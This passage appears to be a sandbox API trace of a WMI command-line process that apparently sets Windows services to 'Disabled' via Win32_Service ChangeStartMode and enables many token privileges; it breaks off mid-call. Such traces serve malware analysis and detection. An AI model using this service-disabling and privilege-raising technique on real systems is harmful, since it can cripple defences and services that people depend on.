1 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.689] lstrlenW (lpString="GET") returned 3 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0119.689] lstrlenW (lpString="LIST") returned 4 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0119.689] lstrlenW (lpString="SET") returned 3 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0119.689] lstrlenW (lpString="CREATE") returned 6 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.689] lstrlenW (lpString="CALL") returned 4 [0119.690] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0119.690] lstrlenW (lpString="/") returned 1 [0119.690] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.690] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="/", cchCount2=1) returned 3 [0119.690] lstrlenW (lpString="-") returned 1 [0119.690] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.690] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="-", cchCount2=1) returned 3 [0119.690] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.690] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.690] GetCurrentThreadId () returned 0x9cc [0119.690] ??0CHString@@QAE@XZ () returned 0xecf21c [0119.690] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0119.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x11e8b68, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0119.690] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0119.690] SysStringLen (param_1="SERVICE") returned 0x7 [0119.690] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0119.690] SysStringLen (param_1="'") returned 0x1 [0119.690] IWbemServices:GetObject (in: This=0xfd0820, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xecf1f8*=0x0, ppCallResult=0x0 | out: ppObject=0xecf1f8*=0xff5328, ppCallResult=0x0) returned 0x0 [0119.696] lstrlenW (lpString="CALL") returned 4 [0119.696] lstrlenW (lpString="CALL") returned 4 [0119.696] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0119.696] IWbemClassObject:Get (in: This=0xff5328, wszName="Verbs", lFlags=0, pVal=0xecf1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1b0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfdf1e0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xfdf4a0, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.697] SafeArrayGetLBound (in: psa=0xfdf1e0, nDim=0x1, plLbound=0xecf1c0 | out: plLbound=0xecf1c0) returned 0x0 [0119.697] SafeArrayGetUBound (in: psa=0xfdf1e0, nDim=0x1, plUbound=0xecf1c8 | out: plUbound=0xecf1c8) returned 0x0 [0119.697] SafeArrayGetElement (in: psa=0xfdf1e0, rgIndices=0xecf1d0, pv=0xecf204 | out: pv=0xecf204) returned 0x0 [0119.697] IWbemClassObject:Get (in: This=0xff6cf0, wszName="Name", lFlags=0, pVal=0xecf1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.697] lstrlenW (lpString="StartService") returned 12 [0119.697] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.697] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StartService", cchCount2=12) returned 1 [0119.697] IUnknown:Release (This=0xff6cf0) returned 0x1 [0119.697] SafeArrayGetElement (in: psa=0xfdf1e0, rgIndices=0xecf1d0, pv=0xecf204 | out: pv=0xecf204) returned 0x0 [0119.697] IWbemClassObject:Get (in: This=0xff7220, wszName="Name", lFlags=0, pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.697] lstrlenW (lpString="StopService") returned 11 [0119.697] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.697] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StopService", cchCount2=11) returned 1 [0119.697] IUnknown:Release (This=0xff7220) returned 0x1 [0119.697] SafeArrayGetElement (in: psa=0xfdf1e0, rgIndices=0xecf1d0, pv=0xecf204 | out: pv=0xecf204) returned 0x0 [0119.697] IWbemClassObject:Get (in: This=0xff7760, wszName="Name", lFlags=0, pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.697] lstrlenW (lpString="PauseService") returned 12 [0119.697] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.697] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="PauseService", cchCount2=12) returned 1 [0119.698] IUnknown:Release (This=0xff7760) returned 0x1 [0119.698] SafeArrayGetElement (in: psa=0xfdf1e0, rgIndices=0xecf1d0, pv=0xecf204 | out: pv=0xecf204) returned 0x0 [0119.698] IWbemClassObject:Get (in: This=0xff7ca0, wszName="Name", lFlags=0, pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.698] lstrlenW (lpString="ResumeService") returned 13 [0119.698] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ResumeService", cchCount2=13) returned 1 [0119.698] IUnknown:Release (This=0xff7ca0) returned 0x1 [0119.698] SafeArrayGetElement (in: psa=0xfdf1e0, rgIndices=0xecf1d0, pv=0xecf204 | out: pv=0xecf204) returned 0x0 [0119.698] IWbemClassObject:Get (in: This=0xff8208, wszName="Name", lFlags=0, pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.698] lstrlenW (lpString="InterrogateService") returned 18 [0119.698] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="InterrogateService", cchCount2=18) returned 1 [0119.698] IUnknown:Release (This=0xff8208) returned 0x1 [0119.698] SafeArrayGetElement (in: psa=0xfdf1e0, rgIndices=0xecf1d0, pv=0xecf204 | out: pv=0xecf204) returned 0x0 [0119.698] IWbemClassObject:Get (in: This=0xff8c10, wszName="Name", lFlags=0, pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.698] lstrlenW (lpString="UserControlService") returned 18 [0119.698] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="UserControlService", cchCount2=18) returned 1 [0119.698] IUnknown:Release (This=0xff8c10) returned 0x1 [0119.698] SafeArrayGetElement (in: psa=0xfdf1e0, rgIndices=0xecf1d0, pv=0xecf204 | out: pv=0xecf204) returned 0x0 [0119.698] IWbemClassObject:Get (in: This=0xffcc18, wszName="Name", lFlags=0, pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.698] lstrlenW (lpString="Create") returned 6 [0119.698] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Create", cchCount2=6) returned 1 [0119.699] IUnknown:Release (This=0xffcc18) returned 0x1 [0119.699] SafeArrayGetElement (in: psa=0xfdf1e0, rgIndices=0xecf1d0, pv=0xecf204 | out: pv=0xecf204) returned 0x0 [0119.699] IWbemClassObject:Get (in: This=0x10008e8, wszName="Name", lFlags=0, pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.699] lstrlenW (lpString="Change") returned 6 [0119.699] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Change", cchCount2=6) returned 3 [0119.699] IUnknown:Release (This=0x10008e8) returned 0x1 [0119.699] SafeArrayGetElement (in: psa=0xfdf1e0, rgIndices=0xecf1d0, pv=0xecf204 | out: pv=0xecf204) returned 0x0 [0119.699] IWbemClassObject:Get (in: This=0x1001570, wszName="Name", lFlags=0, pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.699] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.699] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ChangeStartMode", cchCount2=15) returned 2 [0119.699] GetCurrentThreadId () returned 0x9cc [0119.699] ??0CHString@@QAE@XZ () returned 0xecf01c [0119.699] IWbemClassObject:Get (in: This=0x1001570, wszName="Description", lFlags=0, pVal=0xecefec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecefec*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ChangeStartMode method modifies the StartMode of a service. It returns an integer value of 0 if the service was successfully modified, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.699] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.699] IWbemClassObject:Get (in: This=0x1001570, wszName="Parameters", lFlags=0, pVal=0xecf190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf190*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfdf4e0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xfd36c8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.699] IWbemClassObject:Get (in: This=0x1001570, wszName="VerbType", lFlags=0, pVal=0xecf128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf128*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.700] IWbemClassObject:Get (in: This=0x1001570, wszName="Derivation", lFlags=0, pVal=0xecf110*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf110*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.700] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.700] lstrlenW (lpString="ChangeStartMode") returned 15 [0119.700] SafeArrayGetLBound (in: psa=0xfdf4e0, nDim=0x1, plLbound=0xecf1c4 | out: plLbound=0xecf1c4) returned 0x0 [0119.700] SafeArrayGetUBound (in: psa=0xfdf4e0, nDim=0x1, plUbound=0xecf1e0 | out: plUbound=0xecf1e0) returned 0x0 [0119.700] SafeArrayGetElement (in: psa=0xfdf4e0, rgIndices=0xecf1e4, pv=0xecf1f0 | out: pv=0xecf1f0) returned 0x0 [0119.700] IWbemClassObject:Get (in: This=0x1002608, wszName="ParaId", lFlags=0, pVal=0xecf140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.700] IWbemClassObject:Get (in: This=0x1002608, wszName="Type", lFlags=0, pVal=0xecf0d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf0d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.700] IWbemClassObject:Get (in: This=0x1002608, wszName="Default", lFlags=0, pVal=0xecf0f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecf0f8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.700] GetCurrentThreadId () returned 0x9cc [0119.700] ??0CHString@@QAE@XZ () returned 0xecf02c [0119.700] IWbemClassObject:Get (in: This=0x1002608, wszName="Qualifiers", lFlags=0, pVal=0xecefb4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecefb4*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfdf540*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xfd3768, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.700] SafeArrayGetLBound (in: psa=0xfdf540, nDim=0x1, plLbound=0xecefe4 | out: plLbound=0xecefe4) returned 0x0 [0119.700] SafeArrayGetUBound (in: psa=0xfdf540, nDim=0x1, plUbound=0xeceff8 | out: plUbound=0xeceff8) returned 0x0 [0119.700] SafeArrayGetElement (in: psa=0xfdf540, rgIndices=0xecf004, pv=0xecf024 | out: pv=0xecf024) returned 0x0 [0119.700] IWbemClassObject:Get (in: This=0x10028c0, wszName="Name", lFlags=0, pVal=0xecefcc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecefcc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.700] IWbemClassObject:Get (in: This=0x10028c0, wszName="QualifierValue", lFlags=0, pVal=0xecefa4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecefa4*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfdf150*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xfd3678, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.700] SafeArrayGetLBound (in: psa=0xfdf150, nDim=0x1, plLbound=0xecefe8 | out: plLbound=0xecefe8) returned 0x0 [0119.700] SafeArrayGetUBound (in: psa=0xfdf150, nDim=0x1, plUbound=0xecefc8 | out: plUbound=0xecefc8) returned 0x0 [0119.700] lstrlenW (lpString="CIMTYPE") returned 7 [0119.701] lstrlenW (lpString="In") returned 2 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0119.701] lstrlenW (lpString="read") returned 4 [0119.701] lstrlenW (lpString="In") returned 2 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0119.701] lstrlenW (lpString="write") returned 5 [0119.701] lstrlenW (lpString="In") returned 2 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0119.701] lstrlenW (lpString="In") returned 2 [0119.701] lstrlenW (lpString="In") returned 2 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0119.701] SafeArrayGetElement (in: psa=0xfdf150, rgIndices=0xecf010, pv=0xecf018 | out: pv=0xecf018) returned 0x0 [0119.701] lstrlenW (lpString="true") returned 4 [0119.701] lstrlenW (lpString="True") returned 4 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0119.701] IUnknown:Release (This=0x10028c0) returned 0x1 [0119.701] SafeArrayGetElement (in: psa=0xfdf540, rgIndices=0xecf004, pv=0xecf024 | out: pv=0xecf024) returned 0x0 [0119.701] IWbemClassObject:Get (in: This=0x1002bf8, wszName="Name", lFlags=0, pVal=0xecefcc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfd2624, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecefcc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ValueMap", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.701] IWbemClassObject:Get (in: This=0x1002bf8, wszName="QualifierValue", lFlags=0, pVal=0xecefa4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfdf150, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xecefa4*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfdf150*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xfd2868, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.701] SafeArrayGetLBound (in: psa=0xfdf150, nDim=0x1, plLbound=0xecefe8 | out: plLbound=0xecefe8) returned 0x0 [0119.701] SafeArrayGetUBound (in: psa=0xfdf150, nDim=0x1, plUbound=0xecefc8 | out: plUbound=0xecefc8) returned 0x0 [0119.701] lstrlenW (lpString="CIMTYPE") returned 7 [0119.701] lstrlenW (lpString="ValueMap") returned 8 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0119.701] lstrlenW (lpString="read") returned 4 [0119.701] lstrlenW (lpString="ValueMap") returned 8 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0119.701] lstrlenW (lpString="write") returned 5 [0119.701] lstrlenW (lpString="ValueMap") returned 8 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0119.701] lstrlenW (lpString="In") returned 2 [0119.701] lstrlenW (lpString="ValueMap") returned 8 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0119.701] lstrlenW (lpString="Out") returned 3 [0119.701] lstrlenW (lpString="ValueMap") returned 8 [0119.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0119.701] SafeArrayGetElement (in: psa=0xfdf150, rgIndices=0xecf010, pv=0xecf018 | out: pv=0xecf018) returned 0x0 [0119.701] SafeArrayGetElement (in: psa=0xfdf150, rgIndices=0xecf010, pv=0xecf018 | out: pv=0xecf018) returned 0x0 [0119.702] SafeArrayGetElement (in: psa=0xfdf150, rgIndices=0xecf010, pv=0xecf018 | out: pv=0xecf018) returned 0x0 [0119.702] SafeArrayGetElement (in: psa=0xfdf150, rgIndices=0xecf010, pv=0xecf018 | out: pv=0xecf018) returned 0x0 [0119.702] SafeArrayGetElement (in: psa=0xfdf150, rgIndices=0xecf010, pv=0xecf018 | out: pv=0xecf018) returned 0x0 [0119.702] SysStringLen (param_1="ValueMap") returned 0x8 [0119.702] SysStringLen (param_1="In") returned 0x2 [0119.702] SysStringLen (param_1="In") returned 0x2 [0119.702] SysStringLen (param_1="ValueMap") returned 0x8 [0119.702] IUnknown:Release (This=0x1002bf8) returned 0x1 [0119.702] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.702] IUnknown:Release (This=0x1002608) returned 0x1 [0119.702] IUnknown:Release (This=0x1001570) returned 0x1 [0119.702] IUnknown:Release (This=0xff5328) returned 0x0 [0119.703] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.703] lstrlenW (lpString="/") returned 1 [0119.703] lstrlenW (lpString="Disabled") returned 8 [0119.703] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="/", cchCount2=1) returned 3 [0119.703] lstrlenW (lpString="-") returned 1 [0119.703] lstrlenW (lpString="Disabled") returned 8 [0119.703] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="-", cchCount2=1) returned 3 [0119.703] lstrlenW (lpString="Disabled") returned 8 [0119.703] lstrlenW (lpString="Disabled") returned 8 [0119.703] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0119.703] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0119.703] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x27560a3c | out: _String="Select", _Context=0x27560a3c) returned="Select" [0119.703] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x27560a3c | out: _String=0x0, _Context=0x27560a3c) returned="*" [0119.703] lstrlenW (lpString="FROM") returned 4 [0119.703] lstrlenW (lpString="*") returned 1 [0119.703] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0119.703] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x27560a3c | out: _String=0x0, _Context=0x27560a3c) returned="from" [0119.703] lstrlenW (lpString="FROM") returned 4 [0119.704] lstrlenW (lpString="from") returned 4 [0119.704] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0119.704] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x27560a3c | out: _String=0x0, _Context=0x27560a3c) returned="Win32_Service" [0119.704] lstrlenW (lpString="SET") returned 3 [0119.704] lstrlenW (lpString="CALL") returned 4 [0119.704] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0119.704] lstrlenW (lpString="CREATE") returned 6 [0119.704] lstrlenW (lpString="CALL") returned 4 [0119.704] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0119.704] lstrlenW (lpString="GET") returned 3 [0119.704] lstrlenW (lpString="CALL") returned 4 [0119.704] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0119.704] lstrlenW (lpString="LIST") returned 4 [0119.704] lstrlenW (lpString="CALL") returned 4 [0119.704] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0119.704] lstrlenW (lpString="ASSOC") returned 5 [0119.704] lstrlenW (lpString="CALL") returned 4 [0119.704] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0119.704] WbemLocator:IUnknown:AddRef (This=0xfa74f8) returned 0x3 [0119.704] lstrlenW (lpString="") returned 0 [0119.704] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.704] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0119.704] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.704] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.704] GetCurrentThreadId () returned 0x9cc [0119.704] GetCurrentProcess () returned 0xffffffff [0119.704] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xecfb1c | out: TokenHandle=0xecfb1c*=0x270) returned 1 [0119.704] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xecfb18 | out: TokenInformation=0x0, ReturnLength=0xecfb18) returned 0 [0119.704] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x11e9118, TokenInformationLength=0x118, ReturnLength=0xecfb18 | out: TokenInformation=0x11e9118, ReturnLength=0xecfb18) returned 1 [0119.704] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x11e9118*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, 